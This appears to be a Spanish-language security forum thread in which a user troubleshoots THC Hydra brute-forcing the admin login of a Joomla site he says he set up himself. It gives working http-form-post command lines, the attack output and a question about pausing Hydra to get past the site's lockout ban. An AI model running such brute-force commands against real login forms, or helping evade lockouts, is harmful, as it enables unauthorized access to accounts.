Resultados 1 al 4 de 4

Hydra: ayuda con joomla

  1. #1 Hydra: ayuda con joomla 
    Medio
    Fecha de ingreso
    Feb 2009
    Mensajes
    65
    Descargas
    14
    Uploads
    0
    Un cordial saludo a la comunidad HH.

    Estoy aprendiendo a utilizar hydra para hacer un reporte de lo poco recomendable que son las contraseñas cortas y para eso creé una página en joomla 1.7 y atacarla con hydra. He estado leyendo y estudiando su uso pero al ejecutarlo obtengo el siguiente error y el ataque no se realiza.

    Código:
    xxxxx@xxxx:~$ hydra http://yyy.zzzzzzzzzz.com http-form-post "administrator/index.php:username=^USER^&passwd=^PASS^:Log in" -l usuario -P Documentos/passwords.txt -t 10 -w 30 -v
    Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2013-10-28 11:27:33
    [DATA] 10 tasks, 1 server, 9999 login tries (l:1/p:9999), ~999 tries per task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses ... [failed for http://yyy.zzzzzzzzzz.com] done
    0 of 1 target successfuly completed, 0 valid passwords found
    Error: 1 target did not resolve or could not be connected
    Hydra (http://www.thc.org/thc-hydra) finished at 2013-10-28 11:28:13
    No se por qué no resuelve la dirección, he revisado bien el código de la página y las etiquetas de usuario y contraseña parecen estar bien. Tengo dudas acerca del campo Log in justo después de ^PASS^ pero también lo obtuve viendo el código de la página de joomla.

    Si alguien sabe qué error estoy cometiendo estaré agradecido.
    Citar  
     

  2. #2  
    Medio
    Fecha de ingreso
    Feb 2009
    Mensajes
    65
    Descargas
    14
    Uploads
    0
    Después de buscar mucho creo que logré encontrar el problema que era una cosa muy simple. Al momento de especificar la página que sería atacada incluí el prefijo del protocolo, es decir:

    Código:
    hydra http://yyy.zzzzzzzzzz.com http-form-post "administrator/index.php:username=^USER^&passwd=^PASS^:Log in" -l usuario -P Documentos/passwords.txt -t 10 -w 30 -v
    Después de varios ensayos con otros ejemplos pude darme cuenta de que eso era el origen del error así que removí el http:// del comando y parece que funciona:

    Código:
    hydra yyy.zzzzzzzzzz.com http-form-post "index.php:username=^USER^&passwd=^PASS^:Log in" -l usuario -P Documentos/passwords.txt -t 10 -w 30 -v
    Digo parece porque después de tantos intentos fallidos para acceder por FTP quedé baneado de la página , tendré que esperar un buen tiempo jajajaja...

    Aunque eso me genera una pregunta: Si el baneo es temporal y está basado en la cantidad de intentos fallidos ¿hay alguna forma de automatizar para que cuando se obtenga el "timeout" se detenga temporalmente la ejecución de hydra?
    Citar  
     

  3. #3  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    puedes pegar aquí todo lo que te devuelve la terminal cuando intentas conectar al servidor estando tú baneado?
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  4. #4  
    Medio
    Fecha de ingreso
    Feb 2009
    Mensajes
    65
    Descargas
    14
    Uploads
    0
    Lo que obtengo es lo siguiente:
    Código:
    root@mcn:/# hydra xxxx.yyyyyyyyyyyy.com http-form-post "index.php:username=^USER^&passwd=^PASS^:Log in" -l usuario -P Documentos/passwords.txt -t 10 -w 30 -v -V
    Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2013-11-19 10:40:30
    [DATA] 10 tasks, 1 server, 9999 login tries (l:1/p:9999), ~999 tries per task
    [DATA] attacking service http-post-form on port 80
    [VERBOSE] Resolving addresses ... done
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "1" - 1 of 9999 [child 0]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "2" - 2 of 9999 [child 1]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "3" - 3 of 9999 [child 2]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "4" - 4 of 9999 [child 3]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "5" - 5 of 9999 [child 4]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "6" - 6 of 9999 [child 5]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "7" - 7 of 9999 [child 6]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "8" - 8 of 9999 [child 7]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "9" - 9 of 9999 [child 8]
    [ATTEMPT] target xxxx.yyyyyyyyyyyy.com - login "usuario" - pass "10" - 10 of 9999 [child 9]
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 4
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 9
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 7
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 5
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 2
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 3
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 10
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 1
    [80][www-form] host: www.xxx.yyy.105   login: usuario   password: 6
    Process 13143: Can not connect [timeout], process exiting
    [VERBOSE] Retrying connection for child 7
    [STATUS] attack finished for xxxx.yyyyyyyyyyyy.com (waiting for children to finish)
    1 of 1 target successfuly completed, 9 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2013-11-19 10:41:01
    Las contraseñas "halladas" hasta ahí son falsos positivos pero no pasa del intento número 10.

    Por cierto, el diccionario utilizado es de solo números
    Citar  
     

Temas similares

  1. ¿thc-hydra para protocolos post?
    Por irda en el foro INTRUSION
    Respuestas: 1
    Último mensaje: 28-07-2008, 20:26
  2. Hydra!
    Por br3ak3r en el foro APLICACIONES
    Respuestas: 2
    Último mensaje: 15-02-2008, 00:45
  3. Instalacion de Joomla 1.5
    Por mimasol en el foro Tutoriales y Video-Tutoriales
    Respuestas: 0
    Último mensaje: 21-03-2007, 05:53
  4. hydra
    Por NeoGenessis en el foro LINUX - MAC - OTROS
    Respuestas: 2
    Último mensaje: 16-04-2006, 14:49
  5. Necesito ayuda con hydra
    Por me.b en el foro APLICACIONES
    Respuestas: 6
    Último mensaje: 06-10-2005, 13:07

Marcadores

Marcadores